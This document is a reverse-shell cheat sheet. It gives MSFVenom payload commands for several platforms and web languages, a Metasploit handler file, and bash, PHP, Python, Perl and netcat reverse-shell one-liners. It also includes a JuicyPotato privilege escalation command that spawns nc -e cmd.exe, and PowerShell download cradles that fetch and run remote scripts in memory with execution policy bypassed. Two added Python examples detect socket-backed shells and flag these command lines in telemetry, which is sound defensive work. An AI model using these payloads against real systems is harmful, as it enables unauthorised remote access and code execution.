This document provides an overview of different types of shells and how to create them using MSFVenom.

Netcat Shell Listener

The first shell discussed in this document is the netcat shell listener. It can be created using the following command:

nc -nlvp 4444

Meterpreter Shells

Meterpreter shells can be created using MSFVenom. The following commands produce Meterpreter payloads for Linux and Windows and a plain reverse shell for macOS (the osx payload below is not Meterpreter):

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

MSFVenom can also be used to create payloads for web applications. The following commands can be used to create payloads for PHP, ASP, JSP, and WAR:

PHP

msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

OR

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

For the web server to execute the PHP file, add <?php as its first line. On macOS this can be done with the pbcopy/pbpaste clipboard tools:

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

MSFVenom can also be used to create payloads for scripting languages. The following commands can be used to create payloads for Python, Bash, and Perl:

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Handlers

Metasploit handlers can be used to quickly set up Metasploit to receive incoming shells. Save the handler as a resource file (.rc) in the following format:

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Once the required values are filled in, start msfconsole with the resource file (-r takes the path to the file):

msfconsole -L -r <handler.rc>

The sections that follow cover shells that do not depend on MSFVenom, starting with one-liners in common interpreters.

One Liners

Bash

The following command is used for a Bash reverse shell:

bash -i >& /dev/tcp/<ip>/<port> 0>&1

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

PHP

The following command is used for a PHP reverse shell:

php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

Python

The following command is used for a Python reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

NC v1

The following command is used for a Netcat reverse shell:

nc -e /bin/sh <ip> <port>

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

NC v2

The following command is also used for a Netcat reverse shell; it relays /bin/sh through a named pipe, for netcat builds that lack the -e option:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.

Perl

The following command is used for a Perl reverse shell:

perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Replace <ip> and <port> with the IP address and port number of the attacker’s machine.
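The Python and Perl one-liners above work the same way: the process opens a TCP socket, then duplicates it onto file descriptors 0, 1 and 2 (os.dup2 in Python, open(STDIN,">&S") and friends in Perl) before executing /bin/sh. The resulting shell has no terminal at all, which leaves a simple host-side tell on Linux: a shell whose stdin, stdout and stderr all resolve to socket:[inode] under /proc/<pid>/fd. The detector below is an added example written for this page, not code from the original document or from any tool it mentions; SHELLS is an assumed list of shell names worth checking and SAMPLES is constructed input in the shape of /proc data.

```python
import os
import re
from typing import Dict, List, Optional, Tuple

# Assumed list of shell binaries to check; extend it for your environment.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# readlink on /proc/<pid>/fd/N yields "socket:[<inode>]" for a socket-backed descriptor.
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def stdio_on_socket(comm: str, fd_targets: Dict[int, str]) -> bool:
    """True when a shell has fds 0, 1 and 2 all backed by sockets.

    comm        -- process name as found in /proc/<pid>/comm
    fd_targets  -- mapping fd number -> readlink target of /proc/<pid>/fd/<fd>
    A login shell sits on a pty (/dev/pts/N); a cron or CI shell sits on pipes or
    /dev/null; only the dup2 / open(">&S") trick leaves all three on a socket.
    """
    if comm not in SHELLS:
        return False
    return all(SOCKET_RE.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))


def read_stdio_targets(pid: int) -> Optional[Dict[int, str]]:
    """Resolve fds 0-2 of a live process; None if it vanished or we lack permission."""
    targets: Dict[int, str] = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            return None
    return targets


def scan_proc() -> List[Tuple[int, str]]:
    """Walk /proc and return (pid, comm) for shells whose stdio is socket-backed."""
    hits: List[Tuple[int, str]] = []
    if not os.path.isdir("/proc"):
        return hits
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited between listdir and open
        fds = read_stdio_targets(pid)
        if fds is not None and stdio_on_socket(comm, fds):
            hits.append((pid, comm))
    return hits


# Constructed samples in the shape of /proc data (not captured from a real host).
SAMPLES: Dict[str, Tuple[str, Dict[int, str]]] = {
    "login shell on a pty":     ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    "cron job shell":           ("sh",   {0: "/dev/null", 1: "pipe:[12345]", 2: "pipe:[12345]"}),
    "socket-backed shell":      ("sh",   {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]"}),
    "daemon with socket stdio": ("sshd", {0: "socket:[1111]", 1: "socket:[1111]", 2: "socket:[1111]"}),
}

if __name__ == "__main__":
    for label, (comm, fds) in SAMPLES.items():
        verdict = "SUSPICIOUS" if stdio_on_socket(comm, fds) else "ok"
        print(f"{label:28s} {verdict}")
    print("live hits:", scan_proc())
```

Reading the fd links of other users' processes requires root. Note also that the pty upgrade methods further down the page (script, pty.spawn) put the upgraded shell on /dev/pts/N, so after an upgrade it is the parent python or script process whose descriptors are socket-backed; extending the check to a shell's parent closes that gap.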

Shell Upgrade

  • Perl: perl -e 'exec "/bin/bash";' - exec replaces the current process image with /bin/bash, so the Perl process itself becomes a Bash shell.

  • Python: python -c 'import os; os.system("/bin/bash")' - os.system runs /bin/bash as a child process of Python; control returns to Python when that Bash exits.

Interactive Shells

Method 1

script -qc /bin/bash /dev/null
(press CTRL+Z to background the shell)
stty raw -echo; fg
export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

The rows and columns values should match the size of your own terminal.

Method 2

python3 -c 'import pty;pty.spawn("/bin/bash")'
python2 -c 'import pty;pty.spawn("/bin/bash")'

SMB Shell

python .py share smb

\\192.168.119.250\share\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.181\share\nc.exe -e cmd.exe 192.168.119.181 7777"

\\192.168.119.250\share\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.250\share\nc.exe -e cmd.exe 192.168.119.250 5555" -t *

net use X: \\10.10.15.211\share

In memory

Both commands fetch a script over HTTP and run it with Invoke-Expression (IEX) without writing it to disk:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.211:8000?GruntHTTP.exe')"

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.211:8000/mini.ps1')"
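The one-liners earlier on this page (the bash /dev/tcp redirect, nc -e, the mkfifo relay, and the PHP, Python and Perl variants) and the two PowerShell download cradles above each leave a distinctive token sequence in process-creation telemetry (auditd execve records, Sysmon event 1, EDR command-line fields). The scanner below is an added example written for this page, not part of the original document or of any tool it names; RULES is a hand-written starting set and SAMPLE_CMDLINES is constructed input that uses the documentation address 203.0.113.5.

```python
import re
from typing import Iterable, List, Tuple

# Each rule pairs a label with a regex keyed on the structural feature of one technique
# rather than on an address or port. Patterns follow the one-liners and cradles on this
# page; tune them against your own telemetry before relying on them.
RULES: List[Tuple[str, re.Pattern]] = [
    ("bash /dev/tcp redirect",     re.compile(r"/dev/tcp/\S+/\d+")),
    ("netcat -e shell",            re.compile(r"\bnc(?:\.exe)?\s+-e\s+\S*(?:sh|cmd)")),
    ("mkfifo shell relay",         re.compile(r"\bmkfifo\b.*\|\s*/bin/sh")),
    ("php fsockopen + exec",       re.compile(r"fsockopen\(.*\bexec\(")),
    ("python socket + dup2",       re.compile(r"socket\.socket\(.*os\.dup2\(")),
    ("perl socket + exec",         re.compile(r'use Socket;.*exec\("/bin/sh')),
    ("powershell download cradle", re.compile(r"\bIEX\b.*DownloadString\(|DownloadString\(.*\bIEX\b", re.I)),
    ("powershell policy bypass",   re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule the command line matches; an empty list means nothing flagged."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Keep only the (cmdline, matched rule names) pairs that triggered at least one rule."""
    flagged: List[Tuple[str, List[str]]] = []
    for line in cmdlines:
        hits = classify(line)
        if hits:
            flagged.append((line, hits))
    return flagged


# Constructed command lines (not captured from a real host).
SAMPLE_CMDLINES = [
    # benign activity that shares tokens with the rules but must not fire
    "bash -c 'ls -la /tmp'",
    "python3 -c 'import socket; print(socket.gethostname())'",
    "powershell.exe -NoProfile -Command Get-Process",
    "nc -zv 203.0.113.5 443",
    # lines in the shape of this page's one-liners and cradles
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "nc -e /bin/sh 203.0.113.5 4444",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 203.0.113.5 4444 >/tmp/f",
    "php -r '$sock=fsockopen(\"203.0.113.5\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"203.0.113.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "perl -e 'use Socket;$i=\"203.0.113.5\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
    "if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");"
    "open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
    "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5:8000/mini.ps1')\"",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(hits):50s} <- {line[:60]}")
```

Because the rules key on the mechanism (the socket call next to dup2 or exec, the pipe into /bin/sh, IEX next to DownloadString) rather than on an IP or port, retargeting a one-liner does not evade them; base64-encoded or otherwise obfuscated variants will, so treat this as a first tier alongside host-level checks of what a spawned shell's descriptors actually point at.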